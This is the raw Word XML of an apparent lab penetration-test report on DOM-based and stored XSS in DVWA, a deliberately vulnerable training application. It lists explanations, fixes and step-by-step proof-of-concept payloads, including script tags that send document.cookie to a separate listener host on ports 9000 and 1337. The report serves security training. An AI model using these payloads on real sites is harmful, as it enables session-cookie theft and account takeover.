    <w:p w14:paraId="4CB24B35" w14:textId="77777777" w:rsidR="008A2C31" w:rsidRDefault="008A2C31" w:rsidP="008A2C31">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
      <w:r w:rsidRPr="008A2C31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Vulnerability Explanation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This vulnerability allows attackers to inject malicious scripts into web pages viewed by other users, potentially leading to unauthorized actions on behalf of authenticated users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DE0D5E" w14:textId="526AEDD2" w:rsidR="008A2C31" w:rsidRDefault="008A2C31" w:rsidP="008A2C31">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
      <w:r w:rsidRPr="008A2C31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Vulnerability Fix:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> developers should implement strict input validation and output encoding to sanitize user-supplied data and prevent the </w:t>
      </w:r>
      <w:r w:rsidR="00166CEF">
        <w:t>execution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of malicious scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBBBC67" w14:textId="4EEADAF0" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="008A2C31">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Severity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79379E18" w14:textId="58B396F4" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proof of Concept Code Here</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6365326C" w14:textId="77777777" w:rsidR="002034C7" w:rsidRPr="0034765E" w:rsidRDefault="002034C7" w:rsidP="002034C7">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  - Step 1: Injecting malicious script into the DVWA application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4C420F" w14:textId="3BC345F8" w:rsidR="002034C7" w:rsidRPr="002034C7" w:rsidRDefault="002034C7" w:rsidP="002034C7">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2034C7">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A415E5">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="0023763A" w:rsidRPr="0023763A">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>192.168.2.12</w:t>
      </w:r>
      <w:r w:rsidR="0023763A">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:rtl/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="0023763A" w:rsidRPr="0023763A">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>/dvwa/vulnerabilities/xss_d/?default=&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548F17B5" w14:textId="0DB27A05" w:rsidR="002034C7" w:rsidRDefault="002034C7" w:rsidP="002034C7">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">    Screenshot: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B81B7D" w14:textId="0A770AE0" w:rsidR="0023763A" w:rsidRPr="0034765E" w:rsidRDefault="0023763A" w:rsidP="002034C7">
      <w:r w:rsidRPr="0023763A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13E8DA7E" wp14:editId="734689B2">
            <wp:extent cx="5940679" cy="3166281"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="138402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27577" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940679" cy="3166281"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="108D67ED" w14:textId="77777777" w:rsidR="002034C7" w:rsidRPr="0034765E" w:rsidRDefault="002034C7" w:rsidP="002034C7">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  - Step 2: Hosting a malicious payload using Python's HTTP server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD8BB87" w14:textId="3DA28A3D" w:rsidR="002034C7" w:rsidRPr="002034C7" w:rsidRDefault="002034C7" w:rsidP="002034C7">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2034C7">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="0023763A" w:rsidRPr="002034C7">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="002034C7">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>ython</w:t>
      </w:r>
      <w:r w:rsidR="0023763A">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:rtl/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="002034C7">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m http.server 9000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C04DA0D" w14:textId="7D2EBC05" w:rsidR="0023763A" w:rsidRPr="0034765E" w:rsidRDefault="0023763A" w:rsidP="002034C7"/>
    <w:p w14:paraId="3F3776E2" w14:textId="77777777" w:rsidR="002034C7" w:rsidRPr="0034765E" w:rsidRDefault="002034C7" w:rsidP="002034C7">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  - Step 3: Crafting the default parameter to execute the payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5549E54D" w14:textId="49033525" w:rsidR="0023763A" w:rsidRPr="0023763A" w:rsidRDefault="00A415E5" w:rsidP="0023763A">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tl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="0023763A" w:rsidRPr="0023763A">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>192.168.2.128/dvwa/vulnerabilities/xss_d/?default=&lt;script&gt;window.location='http://192.168.2.128:9000/?cookie='+document.cookie&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="002034C7" w:rsidRPr="0023763A">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5E017F" w14:textId="77777777" w:rsidR="000C4750" w:rsidRDefault="003C4FBF" w:rsidP="002034C7">
      <w:r w:rsidRPr="0034765E">
        <w:t>Screenshot:</w:t>
      </w:r>
      <w:r w:rsidR="00A415E5" w:rsidRPr="00A415E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B25397" w14:textId="2FAC3445" w:rsidR="002034C7" w:rsidRDefault="00A415E5" w:rsidP="000C4750">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A415E5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="429435BA" wp14:editId="57AD553F">
            <wp:extent cx="4914900" cy="1396365"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24703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31807" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId21"/>
                    <a:srcRect l="17308"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4914900" cy="1396365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC9FBA4" w14:textId="77777777" w:rsidR="00A415E5" w:rsidRPr="0034765E" w:rsidRDefault="00A415E5" w:rsidP="002034C7"/>
    <w:p w14:paraId="3C3D72F1" w14:textId="77777777" w:rsidR="002034C7" w:rsidRPr="0034765E" w:rsidRDefault="002034C7" w:rsidP="002034C7">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  - Step 4: Exploiting medium security level vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6F4C0A" w14:textId="2490D181" w:rsidR="002034C7" w:rsidRPr="002034C7" w:rsidRDefault="00A415E5" w:rsidP="002034C7">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Pr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00A415E5">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>192.168.2.12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A415E5">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>/dvwa/vulnerabilities/xss_d/?default=English&lt;select&gt;&lt;img src/onerror=alert(document.cookie)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ADFE8F" w14:textId="77777777" w:rsidR="003C4FBF" w:rsidRDefault="002034C7" w:rsidP="003C4FBF">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="003C4FBF" w:rsidRPr="0034765E">
        <w:t xml:space="preserve">Screenshot: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36223B98" w14:textId="77777777" w:rsidR="00A415E5" w:rsidRDefault="00A415E5" w:rsidP="003C4FBF"/>
    <w:p w14:paraId="20DC1962" w14:textId="77777777" w:rsidR="00A415E5" w:rsidRDefault="00A415E5" w:rsidP="003C4FBF"/>
    <w:p w14:paraId="1C3B6268" w14:textId="7347B448" w:rsidR="00A415E5" w:rsidRDefault="00A415E5" w:rsidP="00A415E5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A415E5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B1DE96" wp14:editId="6FC1A79A">
            <wp:extent cx="4483100" cy="971550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60388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9451" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId22"/>
                    <a:srcRect l="22756" t="78205" r="1816"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4483100" cy="971550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D66F58D" w14:textId="42D93AB5" w:rsidR="002034C7" w:rsidRPr="0034765E" w:rsidRDefault="002034C7" w:rsidP="003C4FBF">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  - Step 5: Exploiting hard security level vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E6F8C4" w14:textId="4AC19B5B" w:rsidR="002034C7" w:rsidRPr="002034C7" w:rsidRDefault="00A415E5" w:rsidP="002034C7">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Pr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00A415E5">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>192.168.2.128/dvwa/vulnerabilities/xss_d/?#?default=&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7970471E" w14:textId="3996E63E" w:rsidR="002034C7" w:rsidRDefault="002034C7" w:rsidP="003C4FBF">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="003C4FBF" w:rsidRPr="0034765E">
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB6BF73" w14:textId="77777777" w:rsidR="00A415E5" w:rsidRDefault="00A415E5" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33DBAEC0" w14:textId="77777777" w:rsidR="00A415E5" w:rsidRDefault="00A415E5" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E0350B7" w14:textId="611D15D6" w:rsidR="00724F44" w:rsidRDefault="00A415E5" w:rsidP="00A415E5">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A415E5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57DCCBF8" wp14:editId="15044D7B">
            <wp:extent cx="4432300" cy="984885"/>
            <wp:effectExtent l="0" t="0" r="6350" b="5715"/>
            <wp:docPr id="97278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88970" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId23"/>
                    <a:srcRect l="22863" t="78065" r="2564"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4432300" cy="984885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7691ED97" w14:textId="77777777" w:rsidR="00A415E5" w:rsidRDefault="00A415E5" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31BAF794" w14:textId="36C67561" w:rsidR="00724F44" w:rsidRPr="00724F44" w:rsidRDefault="00724F44" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS (Stored):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA3F03" w14:textId="77777777" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="00724F44">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C587532" w14:textId="77777777" w:rsidR="008A2C31" w:rsidRPr="008A2C31" w:rsidRDefault="008A2C31" w:rsidP="008A2C31">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A2C31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- Vulnerability: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A2C31">
        <w:t>Cross-Site Scripting (XSS) (Stored)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1894EA3B" w14:textId="77777777" w:rsidR="008A2C31" w:rsidRPr="008A2C31" w:rsidRDefault="008A2C31" w:rsidP="008A2C31">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A2C31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- System Vulnerable: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A2C31">
        <w:t>DVWA (Damn Vulnerable Web Application) running at 192.168.2.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EA935B" w14:textId="77777777" w:rsidR="008A2C31" w:rsidRPr="008A2C31" w:rsidRDefault="008A2C31" w:rsidP="008A2C31">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A2C31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- Vulnerability Explanation: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A2C31">
        <w:t>This vulnerability allows attackers to inject malicious scripts into the web application, which are then stored and executed when accessed by other users. Stored XSS vulnerabilities in DVWA can lead to data theft on behalf of authenticated users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7923CD31" w14:textId="77777777" w:rsidR="008A2C31" w:rsidRPr="008A2C31" w:rsidRDefault="008A2C31" w:rsidP="008A2C31">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A2C31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- Vulnerability Fix:  </w:t>
      </w:r>
      <w:r w:rsidRPr="008A2C31">
        <w:t>developers should implement strict input validation and output encoding to sanitize user-supplied data before storing it in the database.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A2C31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F647FEF" w14:textId="7385F5A9" w:rsidR="00724F44" w:rsidRDefault="00724F44" w:rsidP="008A2C31">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Severity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA10780" w14:textId="005A608B" w:rsidR="00512713" w:rsidRDefault="00724F44" w:rsidP="00512713">
      <w:pPr>
        <w:ind w:left="180" w:hanging="180"/>
      </w:pPr>
      <w:r w:rsidRPr="00724F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Proof of Concept Code Here:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC17D25" w14:textId="77777777" w:rsidR="00512713" w:rsidRPr="00512713" w:rsidRDefault="00512713" w:rsidP="00512713">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00512713">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>- Low Security Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EACDAF" w14:textId="77777777" w:rsidR="00512713" w:rsidRPr="0034765E" w:rsidRDefault="00512713" w:rsidP="00512713">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">    - Step 1: Injecting a malicious script to display a cookie alert:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE172DE" w14:textId="0795E362" w:rsidR="00512713" w:rsidRPr="00512713" w:rsidRDefault="00512713" w:rsidP="00512713">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34765E">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00512713">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9D2596" w14:textId="77777777" w:rsidR="00512713" w:rsidRDefault="00512713" w:rsidP="00512713">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">      Screenshot: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38603E3D" w14:textId="0749BCCB" w:rsidR="00512713" w:rsidRDefault="00512713" w:rsidP="00512713">
      <w:r w:rsidRPr="00512713">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32DC689A" wp14:editId="4CA59FE8">
            <wp:extent cx="5106113" cy="1209844"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="127034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40496" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5106113" cy="1209844"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C73222F" w14:textId="77777777" w:rsidR="00512713" w:rsidRDefault="00512713" w:rsidP="00512713"/>
    <w:p w14:paraId="20CBE49E" w14:textId="6C0F73FA" w:rsidR="00512713" w:rsidRDefault="00512713" w:rsidP="00512713">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00512713">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27E13E06" wp14:editId="07153DEE">
            <wp:extent cx="4401164" cy="819264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="605288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88934" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4401164" cy="819264"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE10163" w14:textId="44CFA942" w:rsidR="00512713" w:rsidRPr="0034765E" w:rsidRDefault="00512713" w:rsidP="00512713">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">    - Step 2: Redirecting to a malicious URL with the cookie value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FEF488" w14:textId="6B408B9B" w:rsidR="00512713" w:rsidRPr="00512713" w:rsidRDefault="00512713" w:rsidP="00512713">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512713">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;script&gt;window.location="http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>192.168.2.129</w:t>
      </w:r>
      <w:r w:rsidRPr="00512713">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>:1337/?cookie="+document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F7B668" w14:textId="68057E00" w:rsidR="00512713" w:rsidRDefault="00512713" w:rsidP="00512713">
      <w:r w:rsidRPr="0034765E">
        <w:t xml:space="preserve">      Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD7FCB7" w14:textId="3D6C5B73" w:rsidR="000C4750" w:rsidRDefault="000C4750" w:rsidP="000C4750">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000C4750">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="406F4868" wp14:editId="08398AF6">
            <wp:extent cx="5229955" cy="1162212"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="128300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06360" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5229955" cy="1162212"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A5C90C" w14:textId="7F02788F" w:rsidR="00512713" w:rsidRPr="0034765E" w:rsidRDefault="000C4750" w:rsidP="000C4750">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000C4750">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A41A8D6" wp14:editId="59E69C2E">
            <wp:extent cx="5124450" cy="1088390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9583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7369" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId27"/>
                    <a:srcRect l="13782"/>
                    <a:stretch/>
                  </pic:blipFill>
